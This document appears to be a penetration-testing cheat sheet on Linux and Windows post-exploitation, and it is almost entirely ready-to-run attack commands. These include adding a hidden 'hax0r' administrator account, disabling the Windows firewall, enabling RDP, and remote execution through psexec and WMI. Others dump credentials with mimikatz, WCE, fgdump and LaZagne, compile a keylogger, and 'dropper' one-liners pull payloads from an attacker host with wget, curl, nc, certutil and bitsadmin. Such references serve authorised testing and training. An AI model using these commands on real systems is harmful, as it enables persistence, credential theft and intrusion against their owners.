🥷 The Art of Pentesting: Post-exploitation like an APT
Linux Post-exploitation most common and useful commands
Linux Post-exploitation
Check wrong permissions:
Find setuid binaries:
find / -perm -4000 -ls 2> /dev/null
Find files world writable:
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null
Find directories world writable:
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
Look for interesting files:
find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null
Check sudo:
sudo su
sudo -l
Decrypt PKCS#12 objects:
openssl pkcs12 -info -in $FILE
Show certs in PKCS#7 file:
openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der
Show keystore content:
keytool -list -v -keystore keystore.jks
Commands for information gathering:
ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu
Find users with shell access:
egrep -e '/bin/(ba)?sh' /etc/passwd
Check bootup services:
ls /etc/rc*
SSH relationships and logins:
cat ~/.ssh/*
References:
Tools:
Windows Post-exploitation
Check filesystem:
Like “ls -la” in Linux:
dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt
Compute MD5 hash of a file:
Get-FileHash -Algorithm MD5 -Path .\$FILE
Check registry for sensitive strings:
reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
Check scheduler for vulnerable tasks:
schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt
Other checks:
DRIVERQUERY
wmic os where Primary='TRUE' reboot
List hotfixes to find unpatched exploits:
wmic qfe
notepad myfile.txt:lion.txt
eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts
Wmic commands:
wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get
List SIDs of the system (as admin):
wmic useraccount get name,sid,fullname
Net commands:
net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr
How to setup a backdoor account:
net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add
Check routing/network information:
route print
arp -A
ipconfig /all
getmac
Show files attributes / permissions
cacls cmd.exe
attrib cmd.exe
List services:
sc queryex type=service state=all
net start
Other info:
systeminfo
whoami
Idem for Win XP:
echo %USERNAME%
Firewall managing commands
netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Disable firewall:
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
RDP
Show RDP sessions:
quser
qwinsta
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername/U username /P password
Change RDP daemon status from a Meterpreter session:
msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1
More Meterpreter commands in the following post:
Change RDP port in the Windows Registry:
\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389
Remote Execution commands:
wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP
From sysinternals psexec:
psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1
Copy a file to the target host AND execute it:
psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp
Authenticated WMI Exec via Powershell with metasploit:
msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options
Module options (exploit/windows/local/ps_wmi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN no Domain or machine name
PASSWORD no Password to authenticate with
RHOSTS no Target address range or CIDR identifier
SESSION yes The session to run this module on.
USERNAME no Username to authenticate as
Exploit target:
Id Name
-- ----
0 Universal
msf exploit(windows/local/ps_wmi_exec) >
In the same host but with other role:
runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"
Windows exploit suggester (OBSOLETE)
WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Tools for information gathering
Manual method
dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts
LaZagne
Download LaZagne from https://github.com/AlessandroZ/LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox
RATs (Remote Administration Tools)
Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Sniffers
Sniffers for Windows
Install Wireshark, also use in console dumpcap:
dumpcap -D
dumpcap -i $IFACE
Keyloggers for Windows
Windows keylogger (no admin rights):
To cross-compile it for Windows:
i686-w64-mingw32-g++ klog_main.cpp -o klog -static
Network sniffers for Linux
tcpdump -X -s 0 -i $INTERFACE
Password dumping
mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv
Fgdump
Dumps hashes (needs SYSTEM privileges)
fgdump.exe
WCE (Windows Credential Editor)
Dumps clear passwords:
wce -w
Dumps hashes:
wce
Persistent, writes in credentials.txt:
wce -r
Change your credentials in memory:
wce -s
Droppers
Droppers are programs that allows you to download tools, Trojans, etc to the target machine to follow the compromise locally.
Droppers using Linux
wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE root@$IP:~
Droppers using Windows
Powershell
curl -Uri $URL
See also Powercat.
ROBOCOPY
NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
Direct Transfer:
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
Using a download queue:
bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
Examples:
hh.exe C:\windows\system32\calc.exe
C# compiler built-in command:
csc.exe
Droppers Using known protocols
HTTP
Python2
python -m SimpleHTTPServer
python -m SimpleHTTPServer 80
Python3
python3 -m http.server 8080
PHP
php -S localhost:8000
Ruby
ruby -run -e httpd . -p 8000
FTP
pip install pyftpdlib
python -m pyftpdlib
SMB
impacket-smbserver PAYLOADS /root/payload